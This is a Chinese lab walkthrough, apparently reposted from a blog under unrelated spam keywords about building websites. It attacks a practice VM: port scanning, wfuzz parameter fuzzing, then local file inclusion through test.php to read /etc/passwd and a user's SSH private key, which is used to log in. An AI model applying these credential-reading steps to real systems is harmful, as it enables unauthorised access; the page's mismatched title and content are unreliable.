当前位置: 首页> 健康> 养生 > 如何做表白网站的教程_做网站的公司利润率是多少_优化网站推广教程整站_互联网推广的好处

如何做表白网站的教程_做网站的公司利润率是多少_优化网站推广教程整站_互联网推广的好处

时间:2025/7/11 19:38:25来源:https://blog.csdn.net/m0_66808441/article/details/146575958 浏览次数:0次
如何做表白网站的教程_做网站的公司利润率是多少_优化网站推广教程整站_互联网推广的好处
        第一步:确定靶机IP为192.168.40.129

        第二步:扫描后台及开放端口

#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- 	https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
        第三步:尝试访问扫到的端口和文件

        第四步:尝试使用kali自带的FUZZ

#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
        第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000

#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
        第六步:尝试查看用户qiu的 ssh 密钥

#查看用户qiu的 ssh 密钥  
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
        第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看

#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
        第八步:给予密钥文件权限为600,以正常使用

chmod 600 id_rsa
        第九步:使用这个私钥登录qiu用户,发现连接成功

 ssh -i id_rsa qiu@192.168.40.129

                                                                                                                                    FROM  IYU_

关键字:如何做表白网站的教程_做网站的公司利润率是多少_优化网站推广教程整站_互联网推广的好处

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: